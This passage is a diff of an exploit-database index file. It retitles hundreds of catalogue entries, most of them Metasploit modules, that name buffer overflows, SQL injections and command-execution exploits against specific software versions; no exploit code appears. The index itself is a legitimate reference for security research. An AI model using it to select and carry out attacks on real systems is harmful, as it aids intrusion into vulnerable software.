Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0 16223,platforms/php/webapps/16223.txt,"VidiScript SQL Injection",2011-02-23,ThEtA.Nu,php,webapps,0 -16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b Arbitrary Upload",2011-02-23,"AutoSec Tools",php,webapps,0 +16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary Upload",2011-02-23,"AutoSec Tools",php,webapps,0 16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 WordPress Plugin - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16213,platforms/php/webapps/16213.txt,"Hyena Cart - (index.php) SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16214,platforms/php/webapps/16214.txt,"tplSoccerStats - (player.php) SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14042,7 +14042,7 @@ id,file,description,date,author,platform,type,port 16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 WordPress Plugin - Stored XSS",2011-02-24,"Saif El-Sherei",php,webapps,0 16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 WordPress Plugin - Stored XSS",2011-02-24,"Saif El-Sherei",php,webapps,0 -16234,platforms/netware/dos/16234.rb,"Novell Netware RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0 +16234,platforms/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0 16235,platforms/php/webapps/16235.txt,"WordPress Plugin Forum Server 1.6.5 - SQL Injection",2011-02-24,"High-Tech Bridge SA",php,webapps,0 16236,platforms/php/webapps/16236.txt,"IWantOneButton 3.0.1 WordPress Plugin - Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps,0 16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)",2011-02-24,badc0re,windows,dos,0 @@ -14069,7 +14069,7 @@ id,file,description,date,author,platform,type,port 16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension 'exif_read_data()' Function Remote DoS",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0 -16265,platforms/php/webapps/16265.txt,"Readmore Systems Script SQL Injection",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0 +16265,platforms/php/webapps/16265.txt,"Readmore Systems Script - SQL Injection",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0 16266,platforms/php/webapps/16266.txt,"Quicktech SQL Injection",2011-03-02,eXeSoul,php,webapps,0 16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0 @@ -14087,94 +14087,94 @@ id,file,description,date,author,platform,type,port 16284,platforms/unix/dos/16284.rb,"Subversion Date Svnserve",2010-08-07,Metasploit,unix,dos,0 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar Buffer Overflow",2010-08-25,Metasploit,linux,remote,0 16286,platforms/multiple/remote/16286.rb,"RealServer Describe Buffer Overflow",2010-08-07,Metasploit,multiple,remote,0 -16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver Command Execution",2010-11-11,Metasploit,multiple,remote,0 +16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution",2010-11-11,Metasploit,multiple,remote,0 16288,platforms/multiple/remote/16288.rb,"Generic Payload Handler",2011-02-28,Metasploit,multiple,remote,0 -16289,platforms/linux/remote/16289.rb,"Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow",2010-02-11,Metasploit,linux,remote,0 -16290,platforms/multiple/remote/16290.rb,"VERITAS NetBackup Remote Command Execution",2010-10-09,Metasploit,multiple,remote,0 -16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II Command Execution",2010-09-20,Metasploit,multiple,remote,0 +16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow",2010-02-11,Metasploit,linux,remote,0 +16290,platforms/multiple/remote/16290.rb,"VERITAS NetBackup - Remote Command Execution",2010-10-09,Metasploit,multiple,remote,0 +16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution",2010-09-20,Metasploit,multiple,remote,0 16292,platforms/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)",2010-11-24,Metasploit,multiple,remote,0 16293,platforms/multiple/remote/16293.rb,"Sun Java Calendar Deserialization Exploit",2010-09-20,Metasploit,multiple,remote,0 16294,platforms/multiple/remote/16294.rb,"Sun Java JRE getSoundbank file:// URI Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 -16295,platforms/multiple/remote/16295.rb,"Apple QTJava toQTPointer() Arbitrary Memory Access",2010-09-20,Metasploit,multiple,remote,0 -16296,platforms/osx/remote/16296.rb,"Apple OS X iTunes 8.1.1 ITms Overflow",2010-11-11,Metasploit,osx,remote,0 +16295,platforms/multiple/remote/16295.rb,"Apple QTJava - toQTPointer() Arbitrary Memory Access",2010-09-20,Metasploit,multiple,remote,0 +16296,platforms/osx/remote/16296.rb,"Apple OS X iTunes 8.1.1 - ITms Overflow",2010-11-11,Metasploit,osx,remote,0 16297,platforms/multiple/remote/16297.rb,"Java Statement.invoke() Trusted Method Chain Exploit",2010-12-15,Metasploit,multiple,remote,0 16298,platforms/multiple/remote/16298.rb,"Sun Java JRE AWT setDiffICM Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 16299,platforms/multiple/remote/16299.rb,"Firefox 3.5 - escape() Return Value Memory Corruption",2010-09-20,Metasploit,multiple,remote,0 16300,platforms/multiple/remote/16300.rb,"Mozilla Suite/Firefox Navigator Object Code Execution",2010-09-20,Metasploit,multiple,remote,0 -16301,platforms/multiple/remote/16301.rb,"Firefox location.QueryInterface() Code Execution",2010-09-20,Metasploit,multiple,remote,0 +16301,platforms/multiple/remote/16301.rb,"Firefox - location.QueryInterface() Code Execution",2010-09-20,Metasploit,multiple,remote,0 16302,platforms/multiple/remote/16302.rb,"Signed Applet Social Engineering - Code Execuction",2011-01-08,Metasploit,multiple,remote,0 -16303,platforms/multiple/remote/16303.rb,"Opera 9 Configuration Overwrite",2010-07-27,Metasploit,multiple,remote,0 +16303,platforms/multiple/remote/16303.rb,"Opera 9 - Configuration Overwrite",2010-07-27,Metasploit,multiple,remote,0 16304,platforms/multiple/remote/16304.rb,"Opera historysearch XSS",2010-11-11,Metasploit,multiple,remote,0 -16305,platforms/multiple/remote/16305.rb,"Java RMIConnectionImpl Deserialization Privilege Escalation Exploit",2010-09-27,Metasploit,multiple,remote,0 +16305,platforms/multiple/remote/16305.rb,"Java - RMIConnectionImpl Deserialization Privilege Escalation Exploit",2010-09-27,Metasploit,multiple,remote,0 16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution",2010-09-20,Metasploit,windows,remote,0 -16307,platforms/multiple/local/16307.rb,"PeaZip 2.6.1 Zip Processing Command Injection",2010-09-20,Metasploit,multiple,local,0 -16308,platforms/multiple/remote/16308.rb,"Maple Maplet File Creation and Command Execution",2010-09-20,Metasploit,multiple,remote,0 +16307,platforms/multiple/local/16307.rb,"PeaZip 2.6.1 - Zip Processing Command Injection",2010-09-20,Metasploit,multiple,local,0 +16308,platforms/multiple/remote/16308.rb,"Maple Maplet - File Creation and Command Execution",2010-09-20,Metasploit,multiple,remote,0 16309,platforms/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,Metasploit,multiple,remote,0 16310,platforms/multiple/remote/16310.rb,"PHP 4 - unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,Metasploit,multiple,remote,0 16311,platforms/linux/remote/16311.rb,"wu-ftpd - SITE EXEC/INDEX Format String",2010-11-30,Metasploit,linux,remote,0 16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0 -16313,platforms/php/webapps/16313.rb,"FreeNAS exec_raw.php Arbitrary Command Execution",2010-11-24,Metasploit,php,webapps,0 +16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution",2010-11-24,Metasploit,php,webapps,0 16314,platforms/multiple/remote/16314.rb,"Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",2010-08-07,Metasploit,multiple,remote,0 16315,platforms/multiple/remote/16315.rb,"Axis2 - / SAP BusinessObjects Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0 16316,platforms/multiple/remote/16316.rb,"JBoss Java Class DeploymentFileRepository WAR deployment",2010-08-03,Metasploit,multiple,remote,0 -16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer Authenticated Code Execution",2010-12-14,Metasploit,multiple,remote,0 +16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer - Authenticated Code Execution",2010-12-14,Metasploit,multiple,remote,0 16318,platforms/multiple/remote/16318.rb,"JBoss JMX Console Deployer Upload and Execute",2010-10-19,Metasploit,multiple,remote,0 16319,platforms/multiple/remote/16319.rb,"JBoss JMX Console Beanshell Deployer WAR upload and deployment",2011-01-10,Metasploit,multiple,remote,0 -16320,platforms/unix/remote/16320.rb,"Samba 'username map script' Command Execution",2010-08-18,Metasploit,unix,remote,0 +16320,platforms/unix/remote/16320.rb,"Samba - 'username map script' Command Execution",2010-08-18,Metasploit,unix,remote,0 16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow",2010-04-28,Metasploit,linux,remote,0 -16322,platforms/solaris/remote/16322.rb,"Solaris LPD Command Execution",2010-09-20,Metasploit,solaris,remote,0 +16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution",2010-09-20,Metasploit,solaris,remote,0 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd Heap Overflow",2010-04-30,Metasploit,solaris_sparc,remote,0 -16324,platforms/multiple/remote/16324.rb,"Solaris sadmind Command Execution",2010-06-22,Metasploit,multiple,remote,0 +16324,platforms/multiple/remote/16324.rb,"Solaris sadmind - Command Execution",2010-06-22,Metasploit,multiple,remote,0 16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind adm_build_path() Buffer Overflow",2010-07-03,Metasploit,solaris,remote,0 16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0 -16327,platforms/solaris/remote/16327.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0 +16327,platforms/solaris/remote/16327.rb,"Solaris in.telnetd - TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0 16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet Remote Authentication Bypass",2010-06-22,Metasploit,solaris,remote,0 16329,platforms/solaris/remote/16329.rb,"Samba - lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,Metasploit,solaris,remote,0 16330,platforms/solaris_sparc/remote/16330.rb,"Samba - trans2open Overflow (Solaris SPARC)",2010-06-21,Metasploit,solaris_sparc,remote,0 16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service Overflow",2010-06-22,Metasploit,windows,remote,0 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows Remote Agent Overflow",2010-07-03,Metasploit,windows,remote,0 -16333,platforms/windows/remote/16333.rb,"Windows Media Services ConnectFunnel Stack Buffer Overflow",2010-04-28,Metasploit,windows,remote,0 +16333,platforms/windows/remote/16333.rb,"Windows Media Services - ConnectFunnel Stack Buffer Overflow",2010-04-28,Metasploit,windows,remote,0 16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow",2010-09-20,Metasploit,windows,remote,0 16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16336,platforms/windows/remote/16336.rb,"NIPrint LPD Request Overflow",2010-12-25,Metasploit,windows,remote,0 -16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 LPD Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16339,platforms/windows/remote/16339.rb,"Timbuktu Pro Directory Traversal/File Upload",2010-11-24,Metasploit,windows,remote,0 +16339,platforms/windows/remote/16339.rb,"Timbuktu Pro - Directory Traversal/File Upload",2010-11-24,Metasploit,windows,remote,0 16340,platforms/windows/remote/16340.rb,"Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16341,platforms/windows/remote/16341.rb,"Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 -16342,platforms/windows/remote/16342.rb,"Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16342,platforms/windows/remote/16342.rb,"Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16343,platforms/windows/remote/16343.rb,"Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16344,platforms/windows/remote/16344.rb,"FutureSoft TFTP Server 2000 - Transfer-Mode Overflow",2010-05-09,Metasploit,windows,remote,0 16345,platforms/windows/remote/16345.rb,"D-Link TFTP 1.0 - Long Filename Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16346,platforms/windows/remote/16346.rb,"TFTPDWIN 0.4.2 - Long Filename Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP - Long Mode Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,Metasploit,windows,remote,0 +16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 - Transfer-Mode Overflow",2010-06-15,Metasploit,windows,remote,0 16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21 - Long Filename Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow",2011-03-05,Metasploit,windows,remote,0 -16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",2010-06-15,Metasploit,windows,remote,0 -16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 CSeq Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16354,platforms/windows/remote/16354.rb,"Microsoft IIS ISAPI w3who.dll Query String Overflow",2010-07-07,Metasploit,windows,remote,0 -16355,platforms/windows/remote/16355.rb,"Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow",2010-07-25,Metasploit,windows,remote,0 -16356,platforms/windows/remote/16356.rb,"Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow",2010-07-25,Metasploit,windows,remote,0 +16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow",2010-06-15,Metasploit,windows,remote,0 +16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 - CSeq Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16354,platforms/windows/remote/16354.rb,"Microsoft IIS - ISAPI w3who.dll Query String Overflow",2010-07-07,Metasploit,windows,remote,0 +16355,platforms/windows/remote/16355.rb,"Microsoft IIS - ISAPI nsiislog.dll ISAPI POST Overflow",2010-07-25,Metasploit,windows,remote,0 +16356,platforms/windows/remote/16356.rb,"Microsoft IIS - ISAPI FrontPage fp30reg.dll Chunked Overflow",2010-07-25,Metasploit,windows,remote,0 16357,platforms/windows/remote/16357.rb,"Microsoft IIS Phone Book Service Overflow",2010-04-30,Metasploit,windows,remote,0 16358,platforms/windows/remote/16358.rb,"Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",2010-09-20,Metasploit,windows,remote,0 16359,platforms/windows/remote/16359.rb,"Microsoft WINS Service Memory Overwrite",2010-09-20,Metasploit,windows,remote,0 16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,Metasploit,windows,remote,0 16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061)",2011-02-17,Metasploit,windows,remote,0 16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,Metasploit,windows,remote,0 -16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,Metasploit,windows,remote,0 +16363,platforms/windows/remote/16363.rb,"Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,Metasploit,windows,remote,0 16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,Metasploit,windows,remote,0 16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service Overflow",2010-08-30,Metasploit,windows,dos,0 16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow (SMB)",2010-09-28,Metasploit,windows,remote,0 16367,platforms/windows/remote/16367.rb,"Microsoft Server Service NetpwPathCanonicalize Overflow",2011-02-17,Metasploit,windows,remote,0 16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",2010-07-03,Metasploit,windows,remote,0 16369,platforms/windows/remote/16369.rb,"Microsoft Services - nwwks.dll (MS06-066)",2010-05-09,Metasploit,windows,remote,0 -16370,platforms/windows/remote/16370.rb,"Timbuktu 8.6.6 PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16370,platforms/windows/remote/16370.rb,"Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service Overflow",2010-07-03,Metasploit,windows,remote,0 16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service NetpManageIPCConnect Overflow",2010-10-05,Metasploit,windows,remote,0 16373,platforms/windows/remote/16373.rb,"Microsoft Services - nwapi32.dll (MS06-066)",2010-08-25,Metasploit,windows,remote,0 -16374,platforms/windows/remote/16374.rb,"Microsoft Windows Authenticated User Code Execution",2010-12-02,Metasploit,windows,remote,0 +16374,platforms/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution",2010-12-02,Metasploit,windows,remote,0 16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service RASMAN Registry Overflow",2010-08-25,Metasploit,windows,remote,0 16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16377,platforms/windows/remote/16377.rb,"Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007)",2010-07-25,Metasploit,windows,remote,0 @@ -14186,7 +14186,7 @@ id,file,description,date,author,platform,type,port 16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow",2010-07-03,Metasploit,windows,remote,0 +16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow",2010-07-03,Metasploit,windows,remote,0 16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver Probe Response SSID Overflow",2010-07-03,Metasploit,hardware,remote,0 16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver - Long Beacon Overflow",2010-07-03,Metasploit,hardware,remote,0 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 @@ -14194,9 +14194,9 @@ id,file,description,date,author,platform,type,port 16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16392,platforms/windows/remote/16392.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption",2011-01-24,Metasploit,windows,remote,0 16393,platforms/windows/remote/16393.rb,"Microsoft SQL Server Resolution Overflow",2010-04-30,Metasploit,windows,remote,0 -16394,platforms/windows/remote/16394.rb,"Microsoft SQL Server Payload Execution via SQL injection",2011-02-08,Metasploit,windows,remote,0 +16394,platforms/windows/remote/16394.rb,"Microsoft SQL Server - Payload Execution via SQL injection",2011-02-08,Metasploit,windows,remote,0 16395,platforms/windows/remote/16395.rb,"Microsoft SQL Server Payload Execution",2010-12-21,Metasploit,windows,remote,0 -16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,Metasploit,windows,remote,0 +16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,Metasploit,windows,remote,0 16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,Metasploit,windows,remote,0 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,Metasploit,windows,remote,0 16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14217,14 +14217,14 @@ id,file,description,date,author,platform,type,port 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow",2010-11-03,Metasploit,windows,remote,0 16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow",2011-03-10,Metasploit,windows,remote,0 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow",2010-11-04,Metasploit,windows,remote,0 -16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow (1)",2010-10-05,Metasploit,windows,remote,0 +16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (1)",2010-10-05,Metasploit,windows,remote,0 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve Message Engine Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16420,platforms/windows/remote/16420.rb,"Firebird Relational Database SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16420,platforms/windows/remote/16420.rb,"Firebird Relational Database - SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0 16422,platforms/windows/remote/16422.rb,"mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 -16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 - RTSP Response Header Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16427,platforms/windows/remote/16427.rb,"Windows RSH daemon Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14232,191 +14232,191 @@ id,file,description,date,author,platform,type,port 16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16430,platforms/windows/remote/16430.rb,"BigAnt Server 2.2 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16431,platforms/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 - Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 -16432,platforms/windows/remote/16432.rb,"Firebird Relational Database isc_create_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16432,platforms/windows/remote/16432.rb,"Firebird Relational Database - isc_create_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16433,platforms/windows/remote/16433.rb,"Bomberclone 0.11.6 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM StarTeam Multicast Service Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 -16437,platforms/windows/remote/16437.rb,"Borland InterBase isc_create_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16437,platforms/windows/remote/16437.rb,"Borland InterBase - isc_create_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA Topology DELETEDEVICE Overflow",2010-09-20,Metasploit,windows,remote,0 16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Buffer Overflow",2010-08-25,Metasploit,windows,remote,0 -16440,platforms/windows/remote/16440.rb,"Firebird Relational Database isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16440,platforms/windows/remote/16440.rb,"Firebird Relational Database - isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16441,platforms/windows/remote/16441.rb,"POP Peeper 3.4 - DATE Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16442,platforms/windows/remote/16442.rb,"Microsoft DirectX DirectShow SAMI Buffer Overflow",2010-10-05,Metasploit,windows,remote,0 -16443,platforms/windows/remote/16443.rb,"Eureka Email 2.2q ERR Remote Buffer Overflow Exploit",2010-08-25,Metasploit,windows,remote,0 +16443,platforms/windows/remote/16443.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow Exploit",2010-08-25,Metasploit,windows,remote,0 16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16445,platforms/windows/remote/16445.rb,"Bopup Communications Server Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow Exploit (Windows)",2010-10-09,Metasploit,windows,remote,0 -16447,platforms/windows/remote/16447.rb,"Borland InterBase isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16447,platforms/windows/remote/16447.rb,"Borland InterBase - isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16448,platforms/windows/remote/16448.rb,"BakBone NetVault Remote Heap Overflow",2010-09-20,Metasploit,windows,remote,0 -16449,platforms/windows/remote/16449.rb,"Borland InterBase SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16449,platforms/windows/remote/16449.rb,"Borland InterBase - SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16450,platforms/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow",2010-07-03,Metasploit,windows,remote,0 16451,platforms/windows/remote/16451.rb,"eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow",2010-09-20,Metasploit,windows,remote,0 16452,platforms/windows/remote/16452.rb,"AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow",2010-05-11,Metasploit,windows,remote,0 -16453,platforms/windows/remote/16453.rb,"Borland Interbase Create-Request Buffer 